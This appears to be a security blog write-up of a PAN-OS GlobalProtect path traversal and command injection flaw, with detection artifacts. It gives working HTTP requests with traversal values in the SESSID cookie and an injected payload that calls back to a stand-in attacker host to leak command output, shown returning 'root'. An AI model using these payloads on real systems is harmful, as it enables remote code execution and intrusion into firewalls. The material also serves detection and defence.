BrainScope

Exploit and Detect Pan OS < 11.1 Command Injection

Author:
Published on:

Pan OS < 11.1 Command Injection PoC and Artifacts

André Eichhofer

Preconditions

There is a path traversal and command injection vulnerability in Palo Alto OS < 11.1 firewalls which leads to remote code execution. The application must be configured with GlobalProtect gateway and telemetry must be enabled.

Reason for the vulnerabilty is

  • an improper input validation when parsing session IDs, which allows path traversal and the creation of a zero byte file
  • an improper sanitisation when a curl command is executed on the server side, which allows to craft an arbitrary command

The vulnerabilities can be exploited when the application copies telemetry data to a specific location on the file system.

Normal behavior of the application

┌────────────────────────────────────────────────────────────────┐ 
│                                                                │ 
│                          Application                           │ 
│                                                                │ 
└──────────────────────────────────────────────┬─────────────────┘ 
                                               │                   
                                               │                   
                                               │                   
                                               ▼                   
┌──────────────────────┐                                           
│ <directory_location> │   curl 'telemetry log files' to <directory_location> 
└──────────────────────┘                                           
            │                                                    ▲                   
            │                                                    │                   
            └────────────────────────────────────────────────────┘


Arbitrary file write

An attacker can send a HTTP request to a non-existing URL on the server with a malicious session ID parameter.

Example

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: hostname
Cookie: SESSID=foo_bar

The manipulated content is reflected in the server weblogs like this

... failed to load file /tmp/sslvpn/session_foo_bar

In addition the SESSID parameter is prone to a path traversal vulnerability which allows to to write an arbitrary zero byte file into an arbitrary location.

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: hostname
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/test.txt;

Accessing the file under <host>/sslvpndocs/global-protect/portal/images/test.txt results in a 403 which proofs that the file has been written.


Command injection

The application uses the curl command internally to copy log files from a temporary location to opt/panlogs/tmp/device_telemetry/minute/ on the file system. This behaviour can be checked by inspecting the application log files:

Example application log file

24-04-16 02:28:05,060 dt INFO S2: XFILE: send_file: curl cmd: '/usr/bin/curl -v -H "Content-Type: application/octet-stream" -X PUT "<https://storage.googleapis.com/bulkreceiver-cdl-prd1-sg/telemetry/><SERIAL_NO>/2024/04/16/09/28//opt/panlogs/tmp/device_telemetry/minute/PA_<SERIAL_NO>_dt_11.1.2_20240416_0840_5-min-interval_MINUTE.tgz?GoogleAccessId=bulkreceiver-frontend-sg-prd@cdl-prd1-sg.iam.gserviceaccount.com&Expires=1713260285&Signature=<truncated>" --data-binary @/opt/panlogs/tmp/device_telemetry/minute/PA_<SERIAL_NO>_dt_11.1.2_20240416_0840_5-min-interval_MINUTE.tgz --capath /tmp/capath'

Now, the vulnerable SESSID parameter can be used to write a string into the directory location which used by curl

Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere

The string is reflected in the curl shell command like this:

'/usr/bin/curl -v -H "Content-Type: application/octet-stream" -X PUT ... ... --data-binary @/opt/panlogs/tmp/device_telemetry/minute/hellothere

This makes it possible to craft an arbitrary command and append it to the curl shell command. To exploit this vulnerability you can open a web server on the attacker machine, e.g: python3 -m http.server 4444 and send a command over the SESSID parameter to the application, 

Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere`curl${IFS}attacker:4444?user=$(whoami)`;

The command will be concatenated internally to the curl shell command like this,

'/usr/bin/curl -v -H "Content-Type: application/octet-stream" -X PUT ... ... --data-binary @/opt/panlogs/tmp/device_telemetry/minute/hellothere`curl${IFS}attacker:4444?user=$(whoami)

The command will be executed on the attacker machine by sending the output the web server

python3 -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
<host_ip> - - "GET /?user=root HTTP/1.1" 200 -


Artifacts

You can check exploitation attempts by reviewing the log data of the nginx web server and the application logs. Download and unzip the techsupport.tgz file.

  • PAN-OS application log file with telemetry data can and curl shell command: var/log/pan/device_telemetry_send.log -> check for unusual entries
  • Check the following Nginx log files for unusual entries: var/nginx/log/sslvpn_access.log


Links

https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/